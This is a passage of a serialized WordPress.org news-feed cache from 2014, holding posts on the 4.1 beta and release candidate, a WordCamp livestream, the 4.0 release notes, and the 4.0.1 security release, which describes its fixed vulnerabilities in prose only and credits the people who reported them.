href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta support forum</a>. If any known issues come up, you&#8217;ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.1 RC1, you can use the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin or you can <a href=\"https://wordpress.org/wordpress-4.1-RC1.zip\">download the release candidate here</a> (zip). If you&#8217;d like to learn more about what&#8217;s new in WordPress 4.1, visit the About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) or check out the <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">beta announcement</a>.</p>\n<p><strong>Developers</strong>, please test your plugins and themes against WordPress 4.1 and update your plugin&#8217;s <em>Tested up to</em> version in the readme to 4.1 before next week. If you find compatibility problems, we never want to break things, so please be sure to post to the support forums so we can figure those out before the final release.</p>\n<p>Be sure to <a href=\"https://make.wordpress.org/core/\">follow along the core development blog</a>, where we&#8217;ll continue to post <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers</a> for 4.1. (For example: if you&#8217;ve written a child theme for Twenty Fifteen, some of the new pagination functions have been renamed for clarity.)</p>\n<p><em>Testing four point one</em><br />\n<em>Why are we up at this hour?</em><br />\n<em>Code is poetry</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 4.0.1 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Nov 2014 18:55:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3363\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:345:\"WordPress 4.0.1 is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately. Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3395:\"<p>WordPress 4.0.1 is now available. This is a <strong>critical security release</strong> for all previous versions and we strongly encourage you to update your sites immediately.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be updated to 3.9.3, 3.8.5, or 3.7.5 to keep everything secure. (We don’t support older versions, so please update to 4.0.1 for the latest and greatest.)</p>\n<p>WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported by <a href=\"http://klikki.fi/\">Jouko Pynnonen</a>. This issue does not affect version 4.0, but version 4.0.1 does address these eight security issues:</p>\n<ul>\n<li>Three cross-site scripting issues that a contributor or author could use to compromise a site. Discovered by <a href=\"http://joncave.co.uk/\">Jon Cave</a>, <a href=\"http://www.miqrogroove.com/\">Robert Chapin</a>, and <a href=\"https://johnblackbourn.com/\">John Blackbourn</a> of the WordPress security team.</li>\n<li>A cross-site request forgery that could be used to trick a user into changing their password.</li>\n<li>An issue that could lead to a denial of service when passwords are checked. Reported by <a href=\"http://www.behindthefirewalls.com/\">Javier Nieto Arevalo</a> and <a href=\"http://www.devconsole.info/\">Andres Rojas Guerrero</a>.</li>\n<li>Additional protections for server-side request forgery attacks when WordPress makes HTTP requests. Reported by Ben Bidner (vortfu).</li>\n<li>An extremely unlikely hash collision could allow a user&#8217;s account to be compromised, that also required that they haven&#8217;t logged in since 2008 (I wish I were kidding). Reported by <a href=\"http://david.dw-perspective.org.uk\">David Anderson</a>.</li>\n<li>WordPress now invalidates the links in a password reset email if the user remembers their password, logs in, and changes their email address. Reported separately by <a href=\"https://twitter.com/MomenBassel\">Momen Bassel</a>, <a href=\"http://c0dehouse.blogspot.in/\">Tanoy Bose</a>, and <a href=\"https://managewp.com/\">Bojan Slavković of ManageWP</a>.</li>\n</ul>\n<p>Version 4.0.1 also fixes 23 bugs with 4.0, and we&#8217;ve made two hardening changes, including better validation of EXIF data we are extracting from uploaded photos. Reported by <a href=\"http://www.securesolutions.no/\">Chris Andrè Dale</a>.</p>\n<p>We appreciated the <a href=\"https://codex.wordpress.org/FAQ_Security\">responsible disclosure</a> of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_4.0.1\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/4.0?rev=30475&amp;stop_rev=29710\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.0.1</a> or venture over to <strong>Dashboard → Updates</strong> and simply click “Update Now”.</p>\n<p><em>Already testing WordPress 4.1? The second beta is now available (<a href=\"https://wordpress.org/wordpress-4.1-beta2.zip\">zip</a>) and it contains these security fixes. For more on 4.1, see <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the beta 1 announcement post</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:48:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.1 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Nov 2014 22:35:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3352\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:346:\"Welcome, everyone, to WordPress 4.1 Beta 1! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the WordPress Beta Tester plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3409:\"<p>Welcome, everyone, to WordPress 4.1 Beta 1!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can <a href=\"//wordpress.org/wordpress-4.1-beta1.zip\">download the beta here</a> (zip).</p>\n<p>WordPress 4.1 is due for release next month, so we need your help with testing. Here are some highlights of what to test:</p>\n<ul>\n<li>Our beautiful new default theme, <a href=\"https://make.wordpress.org/core/2014/09/09/twenty-fifteen/\">Twenty Fifteen</a>. It&#8217;s a clean, mobile-first, blog-focused theme designed through simplicity.</li>\n<li>A new <a href=\"https://make.wordpress.org/core/2014/11/11/focus-v2-demo-video/\">distraction-free writing mode for the editor</a>. It&#8217;s enabled by default for beta, and we&#8217;d love feedback on it.</li>\n<li>The ability to automatically install new language packs right from the General Settings screen (available as long as your site&#8217;s filesystem is writable).</li>\n<li>A new inline formatting toolbar for images embedded into posts.</li>\n</ul>\n<p>There have been a lot of changes for developers to test as well:</p>\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2014/10/20/update-on-query-improvements-in-4-1/\">Improvements to meta, date, comment, and taxonomy queries</a>, including complex (nested, multiple relation) queries; and querying comment types (<a href=\"https://core.trac.wordpress.org/ticket/12668\">#12668</a>).</li>\n<li>A single term shared across multiple taxonomies is now split into two when updated. For more, <a href=\"https://make.wordpress.org/core/2014/11/12/an-update-on-the-taxonomy-roadmap/\">see this post</a>, <a href=\"https://core.trac.wordpress.org/ticket/5809\">#5809</a>, and <a href=\"https://core.trac.wordpress.org/ticket/30335\">#30335</a>.</li>\n<li>A new and better way for <a href=\"https://make.wordpress.org/core/2014/10/29/title-tags-in-4-1/\">themes to handle title tags</a>.</li>\n<li>Several <a href=\"https://make.wordpress.org/core/2014/10/27/toward-a-complete-javascript-api-for-the-customizer/\">improvements to the Customizer API</a>, including contextual panels and sections, and JavaScript templates for controls.</li>\n</ul>\n<p>If you want a more in-depth view of what changes have made it into 4.1, <a href=\"https://make.wordpress.org/core/tag/week-in-core/\">check out the weekly review posts</a> on the main development blog.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a> and <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;group=component&amp;milestone=4.1\">everything we’ve fixed</a> so far.</p>\n<p>Happy testing!</p>\n<p><em>Twenty Fifteen theme</em><br />\n<em> The beautiful face which hides</em><br />\n<em> Many improvements</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Watch WordCamp San Francisco Livestream\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/10/wcsf-livestream/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/10/wcsf-livestream/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Oct 2014 20:18:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3341\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:381:\"WordCamp San Francisco is the official annual WordPress conference, gathering the community every year since 2006. This is the time when Matt Mullenweg addresses the community in his annual State of the Word presentation – a recap of  the year in WordPress and giving us a glimpse into its future. This year the speaker lineup is stellar. There will be talks by [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Nikolay Bachiyski\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1975:\"<p><a title=\"2014 edition\" href=\"http://2014.sf.wordcamp.org\">WordCamp San Francisco</a> is the official annual WordPress conference, gathering the community every year <a title=\"An old website for a WordPress long time ago\" href=\"http://2006.sf.wordcamp.org\">since 2006</a>. This is the time when Matt Mullenweg addresses the community in his annual <a href=\"http://wordpress.tv/?s=state+of+the+word\">State of the Word</a> presentation – a recap of  the year in WordPress and giving us a glimpse into its future.</p>\n<p>This year the speaker lineup is stellar. There will be talks by three of the lead WordPress developers: <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-andrew-nacin\">Andrew Nacin</a>, <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-helen-hou-sandi\">Helen Hou-Sandí</a>, and <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-mark-jaquith\">Mark Jaquith</a>. We’re also looking forward to speakers like <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jenny-lawson\">Jenny Lawson</a>, also known as The Bloggess, and <a href=\"http://2014.sf.wordcamp.org/speaker/chris-lema/\">Chris Lema</a>. If you’re at all interested in the web, you will appreciate the appearance of <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jeff-veen\">Jeff Veen</a> – one of the creators of Google Analytics and co-founder of Typekit.</p>\n<p>Even though San Francisco is far far away for most of you, you can still be part of the fun and watch all presentations in real-time via livestream:</p>\n<p><a href=\"http://2014.sf.wordcamp.org/tickets/\">Get a livestream ticket and watch all talks from WordCamp San Francisco live</a></p>\n<p>If you hurry, you can get one of the special livestream tickets, including a WordCamp San Francisco 2104 t-shirt. You can find all the technical details and start times <a href=\"http://2014.sf.wordcamp.org/live-stream/\">at the WordCamp San Francisco website</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/10/wcsf-livestream/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.0 “Benny”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/09/benny/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/09/benny/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Sep 2014 17:05:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3296\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:370:\"Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader Benny Goodman, is available for download or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we&#8217;ve put a little extra polish into it. This release brings you a smoother writing and management experience [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:23573:\"<p>Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader <a href=\"http://en.wikipedia.org/wiki/Benny_Goodman\">Benny Goodman</a>, is available <a href=\"https://wordpress.org/download/\">for download</a> or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we&#8217;ve put a little extra polish into it. This release brings you a smoother writing and management experience we think you&#8217;ll enjoy.</p>\n<div id=\"v-bUdzKMro-1\" class=\"video-player\"><embed id=\"v-bUdzKMro-1-video\" src=\"https://v0.wordpress.com/player.swf?v=1.04&amp;guid=bUdzKMro&amp;isDynamicSeeking=true\" type=\"application/x-shockwave-flash\" width=\"692\" height=\"388\" title=\"Introducing WordPress 4.0 &quot;Benny&quot;\" wmode=\"direct\" seamlesstabbing=\"true\" allowfullscreen=\"true\" allowscriptaccess=\"always\" overstretch=\"true\"></embed></div>\n<hr />\n<h2 style=\"text-align: center\">Manage your media with style</h2>\n<p><img class=\"alignnone size-full wp-image-3316\" src=\"https://wordpress.org/news/files/2014/09/media.jpg\" alt=\"Media Library\" width=\"1000\" height=\"586\" />Explore your uploads in a beautiful, endless grid. A new details preview makes viewing and editing any amount of media in sequence a snap.</p>\n<hr />\n<h2 style=\"text-align: center\">Working with embeds has never been easier</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement(\'video\');</script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-3296-1\" width=\"632\" height=\"445\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/embed.mp4?_=1\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/embed.webm?_=1\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/embed.ogv?_=1\" /><a href=\"//s.w.org/images/core/4.0/embed.mp4\">//s.w.org/images/core/4.0/embed.mp4</a></video></div>\n<p>Paste in a YouTube URL on a new line, and watch it magically become an embedded video. Now try it with a tweet. Oh yeah — embedding has become a visual experience. The editor shows a true preview of your embedded content, saving you time and giving you confidence.</p>\n<p>We’ve expanded the services supported by default, too — you can embed videos from CollegeHumor, playlists from YouTube, and talks from TED. <a href=\"https://codex.wordpress.org/Embeds\">Check out all of the embeds</a> that WordPress supports.</p>\n<hr />\n<h2 style=\"text-align: center\">Focus on your content</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-3296-2\" width=\"632\" height=\"356\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/focus.mp4?_=2\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/focus.webm?_=2\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/focus.ogv?_=2\" /><a href=\"//s.w.org/images/core/4.0/focus.mp4\">//s.w.org/images/core/4.0/focus.mp4</a></video></div>\n<p>Writing and editing is smoother and more immersive with an editor that expands to fit your content as you write, and keeps the formatting tools available at all times.</p>\n<hr />\n<h2 style=\"text-align: center\">Finding the right plugin</h2>\n<p><img class=\"aligncenter size-large wp-image-3309\" src=\"https://wordpress.org/news/files/2014/09/add-plugin1-1024x600.png\" alt=\"Add plugins\" width=\"692\" height=\"405\" /></p>\n<p>There are more than 30,000 free and open source plugins in the WordPress plugin directory. WordPress 4.0 makes it easier to find the right one for your needs, with new metrics, improved search, and a more visual browsing experience.</p>\n<hr />\n<h2 style=\"text-align: center\">The Ensemble</h2>\n<p>This release was led by <a href=\"http://helenhousandi.com\">Helen Hou-Sandí</a>, with the help of these fine individuals. There are 275 contributors with props in this release, a new high. Pull up some Benny Goodman on your music service of choice, as a bandleader or in one of his turns as a classical clarinetist, and check out some of their profiles:</p>\n<p><a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/alexanderrohmann\">Alexander Rohmann</a>, <a href=\"https://profiles.wordpress.org/aliso\">Alison Barrett</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/amit\">Amit Gupta</a>, <a 